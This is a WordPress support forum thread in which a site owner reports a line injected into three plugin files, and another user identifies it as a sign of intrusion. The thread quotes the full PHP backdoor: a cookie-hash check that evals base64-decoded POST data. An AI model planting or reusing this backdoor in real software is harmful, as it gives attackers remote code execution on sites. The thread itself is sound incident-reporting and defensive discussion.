Found new code in plugins

  • boscardin

    (@boscardin)


    18 years, 1 month ago

    I’m not sure if I should be worried or not, but in three of my plugin files:

    Akismet
    Show Top Commentators
    Subscribe2

    I found this piece of code on the first line:

    if(md5($_COOKIE['_wp_debugger'])=="c627e39dbb32136efdfcc397575b5f77"){ eval(base64_decode($_POST['file'])); exit; }

    The hash numbers and letters are different for each file, but everything else is the same. The interesting thing is that those plugin files are NOT CHMOD’ed to 777. Akismet is 775 and the other two are 664.

    Should I be concerned?

Viewing 3 replies - 1 through 3 (of 3 total)
  • mechx1

    (@mechx1)

    18 years, 1 month ago

    Yes, this appears to be a sign of an intrusion.
    See this thread
    You can also search on md5($_COOKIE to learn more

    Thread Starter boscardin

    (@boscardin)

    18 years, 1 month ago

    Oh okay, thanks for that. I searched by “wp_debugger” and didn’t find anything.

    mechx1

    (@mechx1)

    18 years, 1 month ago

    That’s not always the name of the cookie. Can I assume that you have deleted this code from those plugins and searched your php files for more occurances?

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Found new code in plugins’ is closed to new replies.